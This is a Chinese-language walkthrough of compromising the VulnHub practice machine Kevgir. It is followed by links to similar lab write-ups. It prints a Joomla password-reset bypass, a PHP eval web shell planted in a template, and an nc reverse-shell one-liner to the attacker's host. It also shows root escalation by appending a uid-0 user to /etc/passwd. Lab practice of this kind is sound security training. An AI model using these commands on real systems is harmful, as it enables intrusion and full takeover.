vulnhub系列之靶機Kevgir練習

2021-02-20 vulnhub打靶語錄

1、靶機下載地址https://www.vulnhub.com/entry/kevgir-1,137/

2、nmap -sn 192.168.1.0/24掃描靶機IP位址

3、nmap -p- -sV 192.168.1.13掃描埠及其綁定的服務版本信息

4、瀏覽器訪問80、8080沒什麼有用信息,在8081找到joomla cms

5、掃描joomla相關漏洞信息

joomscan -u http://192.168.1.13:8081/

6、瀏覽器訪問https://www.exploit-db.com/exploits/6234找到利用說明

7、訪問http://192.168.1.13:8081/index.php?option=com_user&view=reset&layout=confirm在Token文本框內輸入單引號點擊Submit

輸入admin用戶的新密碼

8、http://192.168.1.13:8081/administrator/管理員登錄界面輸入帳號密碼

9、打開Extensions->Template Manager菜單


10、勾選rhuk_milkyway點擊Edit

彈出頁面點擊Edit HTML按鈕

11、最上面添加一句話<?php @eval($_POST['cmd']);?>後Save保存

12、點擊Preview

彈出界面再次點擊Preview

複製下圖地址欄內的地址

13、打開蟻劍添加數據粘貼到URL地址文本框內,如下

雙擊添加的那一條數據進來如下,右邊右鍵選擇在此處打開終端

打開終端

14、nc -lvvp 8888kali開啟監聽

反彈shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.7 8888 >/tmp/f

轉換shell

python -c 'import pty;pty.spawn("/bin/bash")'

15、查找具有s權位的文件

find / -perm -u=s -type f 2>/dev/null

16、tmp下新建passwd文件

cat /etc/passwd > /tmp/passwd

17、按照passwd格式構造用戶

openssl passwd -1 -salt hack 123456

構造如下用戶名hack密碼123456

hack:$1$hack$.JxSX4bOP1WSqH0kCgs9Y.:0:0::/root:/bin/bash

18、將構造的用戶寫入到/tmp目錄下的passwd文件內

echo 'hack:$1$hack$.JxSX4bOP1WSqH0kCgs9Y.:0:0::/root:/bin/bash' >> /tmp/passwd

19、覆蓋/etc/passwd文件

cp /tmp/passwd /etc/passwd

20、su hack輸入密碼123456切換成功,獲取到了root權限

21、練習結束

相關焦點

  • vulnhub系列之靶機Five86-2練習
    1、nmap -sn 192.168.1.0/24掃描區域網下的存活主機,找到靶機ip2、nmap -sS
  • vulnhub系列之靶機DC-4練習
    1、ifconfig查看本機ip2、nmap -sA 192.168.1.0/24命令掃描同一網段的靶機ip為:192.168.1.7
  • vulnhub系列之靶機DC-5練習
    連結:https://pan.baidu.com/s/1wklyEuS5yJxLFKpq2Pp5Xg 提取碼:xcj41、nmap -sA 192.168.1.0/24掃描靶機ip地址2、nmap -sS -A -p- 192.168.1.8掃描靶機更詳細信息,掃到了3個埠,其中80綁定了nginx服務
  • vulnhub靶機滲透-Connectthedots
    vulnhub靶機滲透-Connectthedots這個靶機比較腦洞,但是最後的提權過程挺有意思的。目標:/home/user.txt and /root/root.txt環境準備由於VMware會出現種種問題,於是改成了Virtual Box,而且Vulhub上的大部分靶機都是使用Virtual Box製作的附上一些相關的配置截圖:kali 2019.04第一塊網卡沒做修改添加了第二塊網卡vulnhub
  • vulnhub系列之靶機DC-8練習
    提權代碼放到了百度網盤,文件名46996.sh,下文同時也貼出了代碼連結:https://pan.baidu.com/s/1wklyEuS5yJxLFKpq2Pp5Xg 提取碼:xcj41、nmap -sn 192.168.1.0/24掃描區域網下的ip,靶機
  • Vulnhub-Gigachad靶機復現
    靶機介紹靶機地址:http://www.vulnhub.com/entry/gigachad-1,657/靶機難度:簡單靶機目標:get flag開整二、靶機復現1 探測靶機的IP位址,使用 nmap 快速掃描 C 段nmap -sn -v -n -PE 192.168.154.0/24 --min-rate=2000
  • Vulnhub-靶機-PWNOS: 2.0 (PRE-RELEASE)
    本篇文章僅用於技術交流學習和研究的目的,嚴禁使用文章中的技術用於非法目的和破壞,否則造成一切後果與發表本文章的作者無關靶機下載之後使用僅主機模式加載到本地
  • Vulnhub靶機 - SOCIAL NETWORK實踐
    %i//發現兩個網段for /l %i in (1,1,3) do for /l %j in (1,1,3) do ping -n 1 192.168.%i.%j//linux//發現一個網段for i in $(seq 1 10);do ping -c 1 172.17.0.$
  • VulnHub之Sumo:1
    虛擬機信息:虛擬機下載地址:https://www.vulnhub.com
  • Vulnhub靶機Five86-2詳細解析
    上篇指路-Vulnhub靶機Five86-1詳細解析靶機地址:http://www.vulnhub.com/entry/five86-2,418/ 技術點總結 •對WordPress網站的滲透 –wpscan •WordPress中IEAC插件的RCE漏洞 –WordPress
  • 【vulnhub】靶機-【DC系列】DC9(附靶機)
    www.ms08067.com)本文作者:大方子(Ms08067實驗室核心成員)主機信息Kali:192.168.56.113DC9:192.168.56.112實驗過程先進行主機探測,查找靶機的PHPSESSID=oshc5jht0a15efnue128kdnn9n' ‐c ‐w /usr/share/SecLists/Discovery/Web‐Content/burp‐parameter‐names.txt http:這裡我們就找到參數file然後我們通過**/proc/sched_debug** 來查看Linux系統中任務的調度情況整理查詢發現靶機上運行這
  • 靶機實戰 |『VulnHub系列』Bottleneck 1-Walkthrough
    靶機地址:https://www.vulnhub.com
  • vulnhub靶機writeup之DC-9
    繼續注入另一個資料庫sqlmap -r 1.txt -D Staff --tablessqlmap -r 1.txt -D Staff -T Users --columnssqlmap
  • 靶機實戰-vuluhub系列-Me-and-My-girlfriend-1
    靶機下載地址https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/
  • DC-3靶機通關記錄
    一、靶機搭建官網連結:https://vulnhub.com/靶機下載地址:http://www.five86.com
  • Vulnhub練習-Tr0ll 1
    https://www.vulnhub.com/entry/tr0ll-1,100/0x02 蓄謀我們這邊就把vlubhub | Tr0ll 安裝在了虛擬機l 攻擊端:Kali Linux 2019l 受害端:VMware Tr0ll
  • vulnhub-DC-6靶機實戰
    簡介 Vulnhub是一個滲透測試實戰網站,DC-6是該系列的第六版,只有一個終極flag。
  • DC-1靶機通關記錄
    一、靶機搭建官網連結:https://download.vulnhub.com/dc/靶機下載地址:http://www.five86
  • vulnhub綜合靶場:MyExpense: 1
    靶機環境:官網地址:https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/靶機安裝過程:1)下載得到對應的ova文件2.在VMware中打開,導入,選擇導入位置即可。
  • vulnhub靶場之GameOver_v0.1_Null_VM
    0x00 vulnhub靶場之GameOver_v0.1_Null_VM傳送門: